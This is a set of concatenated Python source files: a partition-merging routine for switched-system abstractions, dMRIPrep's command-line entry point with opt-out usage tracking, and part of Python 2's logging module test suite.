@param abstractions: keyed by mode
@type abstractions: dict of L{AbstractPwa}
@return: (merged_abstraction, ap_labeling)
where:
- merged_abstraction: L{AbstractSwitched}
- ap_labeling: dict
"""
if len(abstractions) == 0:
warnings.warn('Abstractions empty, nothing to merge.')
return
# consistency check
for ab1 in abstractions.values():
for ab2 in abstractions.values():
p1 = ab1.ppp
p2 = ab2.ppp
if p1.prop_regions != p2.prop_regions:
msg = 'merge: partitions have different sets '
msg += 'of continuous propositions'
raise Exception(msg)
if (
not (p1.domain.A == p2.domain.A).all() or
not (p1.domain.b == p2.domain.b).all()):
raise Exception('merge: partitions have different domains')
# check equality of original PPP partitions
if ab1.orig_ppp == ab2.orig_ppp:
logger.info('original partitions happen to be equal')
init_mode = list(abstractions.keys())[0]
all_modes = set(abstractions)
remaining_modes = all_modes.difference(set([init_mode]))
print('init mode: ' + str(init_mode))
print('all modes: ' + str(all_modes))
print('remaining modes: ' + str(remaining_modes))
# initialize iteration data
prev_modes = [init_mode]
# Create a list of merged-together regions
ab0 = abstractions[init_mode]
regions = list(ab0.ppp)
parents = {init_mode:list(range(len(regions) ))}
ap_labeling = {i:reg.props for i,reg in enumerate(regions)}
for cur_mode in remaining_modes:
ab2 = abstractions[cur_mode]
r = merge_partition_pair(
regions, ab2, cur_mode, prev_modes,
parents, ap_labeling
)
regions, parents, ap_labeling = r
prev_modes += [cur_mode]
new_list = regions
# build adjacency based on spatial adjacencies of
# component abstractions.
# which justifies the assumed symmetry of part1.adj, part2.adj
# Basically, if two regions are either 1) part of the same region in one of
# the abstractions or 2) adjacent in one of the abstractions, then the two
# regions are adjacent in the switched dynamics.
n_reg = len(new_list)
adj = np.zeros([n_reg, n_reg], dtype=int)
for i, reg_i in enumerate(new_list):
for j, reg_j in enumerate(new_list[0:i]):
touching = False
for mode in abstractions:
pi = parents[mode][i]
pj = parents[mode][j]
part = abstractions[mode].ppp
if (part.adj[pi, pj] == 1) or (pi == pj):
touching = True
break
if not touching:
continue
if pc.is_adjacent(reg_i, reg_j):
adj[i,j] = 1
adj[j,i] = 1
adj[i,i] = 1
ppp = PropPreservingPartition(
domain=ab0.ppp.domain,
regions=new_list,
prop_regions=ab0.ppp.prop_regions,
adj=adj
)
abstraction = AbstractSwitched(
ppp=ppp,
modes=abstractions,
ppp2modes=parents,
)
return (abstraction, ap_labeling)
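# Added usage note: merge_partitions() expects the per-mode abstractions keyed
# by mode, e.g. the `abstractions` dict built inside discretize_switched()
# above:
#
#     merged_abstr, ap_labeling = merge_partitions(abstractions)
#
# merged_abstr.ppp is the common refinement of all mode partitions, and
# merged_abstr.ppp2modes maps each merged cell back to its parent cell in
# every mode.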
def merge_partition_pair(
old_regions, ab2,
cur_mode, prev_modes,
old_parents, old_ap_labeling
):
"""Merge an Abstraction with the current partition iterate.
@param old_regions: A list of C{Region} that is from either:
1. The ppp of the first (initial) L{AbstractPwa} to be merged.
2. A list of already-merged regions
@type old_regions: list of C{Region}
    @param ab2: Abstracted piecewise affine dynamics to be merged into the
        current partition iterate.
    @type ab2: L{AbstractPwa}
@param cur_mode: mode to be merged
@type cur_mode: tuple
@param prev_modes: list of modes that have already been merged together
@type prev_modes: list of tuple
    @param old_parents: for each mode that has already been merged, a map from
        indices of regions in C{old_regions} to indices of that mode's
        original regions
    @type old_parents: dict of modes to either a list of region indices into
        C{old_regions}, or a dict of region indices to region indices in the
        original ppp of that mode
@param old_ap_labeling: dict of states of already-merged modes to sets of
propositions for each state
@type old_ap_labeling: dict of tuples to sets
@return: the following:
- C{new_list}, list of new regions
- C{parents}, same as input param C{old_parents}, except that it
includes the mode that was just merged and for list of regions in
return value C{new_list}
- C{ap_labeling}, same as input param C{old_ap_labeling}, except that it
includes the mode that was just merged.
"""
logger.info('merging partitions')
part2 = ab2.ppp
modes = prev_modes + [cur_mode]
new_list = []
parents = {mode:dict() for mode in modes}
ap_labeling = dict()
for i in range(len(old_regions)):
for j in range(len(part2)):
isect = pc.intersect(old_regions[i],
part2[j])
rc, xc = pc.cheby_ball(isect)
# no intersection ?
if rc < 1e-5:
continue
logger.info('merging region: A' + str(i) +
', with: B' + str(j))
# if Polytope, make it Region
if len(isect) == 0:
isect = pc.Region([isect])
# label the Region with propositions
isect.props = old_regions[i].props.copy()
new_list.append(isect)
idx = new_list.index(isect)
# keep track of parents
for mode in prev_modes:
parents[mode][idx] = old_parents[mode][i]
parents[cur_mode][idx] = j
# union of AP labels from parent states
ap_label_1 = old_ap_labeling[i]
ap_label_2 = ab2.ts.states[j]['ap']
logger.debug('AP label 1: ' + str(ap_label_1))
logger.debug('AP label 2: ' + str(ap_label_2))
# original partitions may be different if pwa_partition used
# but must originate from same initial partition,
# i.e., have same continuous propositions, checked above
#
# so no two intersecting regions can have different AP labels,
# checked here
if ap_label_1 != ap_label_2:
msg = 'Inconsistent AP labels between intersecting regions\n'
msg += 'of partitions of switched system.'
raise Exception(msg)
ap_labeling[idx] = ap_label_1
return new_list, parents, ap_labeling
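# Added toy illustration of the bookkeeping above: if old_regions has 2 cells
# and part2 has 2 cells, and every pair intersects, then new_list has 4 cells
# and parents[cur_mode] == {0: 0, 1: 1, 2: 0, 3: 1}, while each previously
# merged mode keeps pointing at its own parent cell via old_parents[mode][i].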
|
run.py
|
#!/usr/bin/env python
"""dMRI preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
import os
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
popylar = None
if not config.execution.notrack:
import popylar
from ..__about__ import __ga_id__
config.loggers.cli.info(
"Your usage of dmriprep is being recorded using popylar (https://popylar.github.io/). ", # noqa
"For details, see https://nipreps.github.io/dmriprep/usage.html. ",
"To opt out, call dmriprep with a `--notrack` flag")
popylar.track_event(__ga_id__, 'run', 'cli_run')
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / '.dmriprep.toml'
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
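        # a non-zero exit code from the child takes precedence; otherwise
        # fall back to the return code it reported through the shared dict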
retcode = p.exitcode or retval.get('return_code', 0)
dmriprep_wf = retval.get('workflow', None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of dMRIPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if dmriprep_wf and config.execution.write_graph:
dmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
retcode = retcode or (dmriprep_wf is None) * os.EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate,
args=(str(config_file), dmriprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
if popylar is not None:
popylar.track_event(__ga_id__, 'run', 'started')
config.loggers.workflow.log(15, '\n'.join(
['dMRIPrep config:'] + ['\t\t%s' % s for s in config.dumps().splitlines()])
)
config.loggers.workflow.log(25, 'dMRIPrep started!')
errno = 1 # Default is error exit unless otherwise set
try:
dmriprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
popylar.track_event(__ga_id__, 'run', 'error')
config.loggers.workflow.critical('dMRIPrep failed: %s', e)
raise
else:
config.loggers.workflow.log(25, 'dMRIPrep finished successfully!')
# Bother users with the boilerplate only iff the workflow went okay.
if (config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md').exists():
config.loggers.workflow.log(
25, 'Works derived from this dMRIPrep execution should '
'include the following boilerplate:\n\n%s',
(config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md').read_text()
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get('fsaverage', suffix='dseg', extension=['.tsv']))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'dmriprep' / 'desc-aseg_dseg.tsv'))
_copy_any(dseg_tsv,
str(config.execution.output_dir / 'dmriprep' / 'desc-aparcaseg_dseg.tsv'))
errno = 0
finally:
from niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.work_dir,
config.execution.run_uuid,
config=pkgrf('dmriprep', 'config/reports-spec.yml'),
packagename='dmriprep')
write_derivative_description(
config.execution.bids_dir,
config.execution.output_dir / 'dmriprep')
if failed_reports and not config.execution.notrack:
popylar.track_event(__ga_id__, 'run', 'reporting_error')
sys.exit(int((errno + failed_reports) > 0))
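# --- Added illustrative sketch (not part of dMRIPrep) ---------------------
# The pattern used in main() above: build an expensive object in a child
# process and pass results back through a multiprocessing.Manager dict, so
# the parent never inherits the child's memory growth. A minimal standalone
# sketch; `_build` is a hypothetical stand-in for build_workflow and, like
# the code above, this assumes the POSIX fork start method.
def _example_build_in_subprocess():
    from multiprocessing import Manager, Process
    def _build(retval):
        retval['return_code'] = 0
        retval['workflow'] = 'placeholder-for-a-workflow-object'
    with Manager() as mgr:
        retval = mgr.dict()
        p = Process(target=_build, args=(retval,))
        p.start()
        p.join()
        retcode = p.exitcode or retval.get('return_code', 0)
        workflow = retval.get('workflow', None)
    return retcode, workflow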
if __name__ == '__main__':
raise RuntimeError("dmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` dmriprep and use the `dmriprep` command")
|
test_logging.py
|
#!/usr/bin/env python
#
# Copyright 2001-2010 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2010 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEquals(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEquals(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
        DEB.warn(m())
        DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
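#
# Added illustration of the last remark above (not part of the original
# tests): an application whose own levels do not fit these constraints can
# translate them through a small mapping dictionary before calling the
# logging APIs. The application-level names used here are hypothetical:
#
#     APP_LEVELS = {'quiet': SILENT, 'normal': SOCIABLE, 'chatty': BORING}
#     logger.log(APP_LEVELS['normal'], "message")
#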
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
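    # Added note: the two flush triggers exercised above correspond to the
    # MemoryHandler(capacity=10, flushLevel=logging.WARNING, target=...)
    # arguments passed in setUp(): a record at or above flushLevel flushes
    # immediately, and so does the record that fills the buffer to capacity.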
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
def apply_config(self, conf):
file = cStringIO.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(StandardError, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEquals(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return cPickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
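# Added note: the wire format consumed by LogRecordStreamHandler above is a
# 4-byte big-endian length prefix (struct.pack(">L", len(payload))) followed
# by a pickled dict of LogRecord attributes; SocketHandler emits exactly this
# framing. The same length-prefixed framing is built by hand in
# setup_via_listener() further down (there carrying a configuration payload
# instead of a log record).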
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEquals(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
